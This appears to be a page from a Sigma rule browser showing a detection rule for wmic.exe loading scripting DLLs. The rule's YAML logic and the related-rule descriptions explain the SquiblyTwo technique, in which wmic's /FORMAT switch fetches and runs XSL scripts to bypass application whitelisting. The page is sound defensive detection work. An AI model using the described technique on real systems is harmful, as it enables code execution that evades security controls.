Phoenix
Sigma IntelligenceBeta
Back to Rules
Detectionmediumtest

WMIC Loading Scripting Libraries

Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc). It could be an indicator of SquiblyTwo technique, which uses Windows Management Instrumentation (WMI) to execute malicious code.

Convert In Phoenix Studio

Open this Sigma rule in the converter with the YAML preloaded and ready for backend selection.

Launch
Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)Created Sat Oct 17Updated Thu Oct 1306ce37c2-61ab-4f05-9ff5-b1a96d18ae32windows
Log Source
WindowsImage Load (DLL)
ProductWindows← raw: windows
CategoryImage Load (DLL)← raw: image_load
Detection Logic
Detection Logic1 selector
detection:
    selection:
        Image|endswith: '\wmic.exe'
        ImageLoaded|endswith:
            - '\jscript.dll'
            - '\vbscript.dll'
    condition: selection
False Positives

The command wmic os get lastbootuptime loads vbscript.dll

The command wmic os get locale loads vbscript.dll

Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights

The command `wmic ntevent` loads vbscript.dll

References
1
Resolving title…
securitydatasets.com
2
Resolving title…
twitter.com
3
Resolving title…
lolbas-project.github.io
MITRE ATT&CK
Related Rules
SimilarDetectionhigh

Potential Remote SquiblyTwo Technique Execution

Detects potential execution of the SquiblyTwo technique that leverages Windows Management Instrumentation (WMI) to execute malicious code remotely. This technique bypasses application whitelisting by using wmic.exe to process malicious XSL (eXtensible Stylesheet Language) scripts that can contain embedded JScript or VBScript. The attack typically works by fetching XSL content from a remote source (using HTTP/HTTPS) and executing it with full trust privileges directly in memory, avoiding disk-based detection mechanisms. This is a common LOLBin (Living Off The Land Binary) technique used for defense evasion and code execution.

Detects similar activity. Both rules may fire on overlapping events.

SimilarDetectionmedium

XSL Script Execution Via WMIC.EXE

Detects the execution of WMIC with the "format" flag to potentially load local XSL files. Adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files.

Detects similar activity. Both rules may fire on overlapping events.

Rule Metadata
Rule ID
06ce37c2-61ab-4f05-9ff5-b1a96d18ae32
Status
test
Level
medium
Type
Detection
Created
Sat Oct 17
Modified
Thu Oct 13
Author
Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
Path
rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml
Raw Tags
attack.defense-evasionattack.t1220
View on GitHub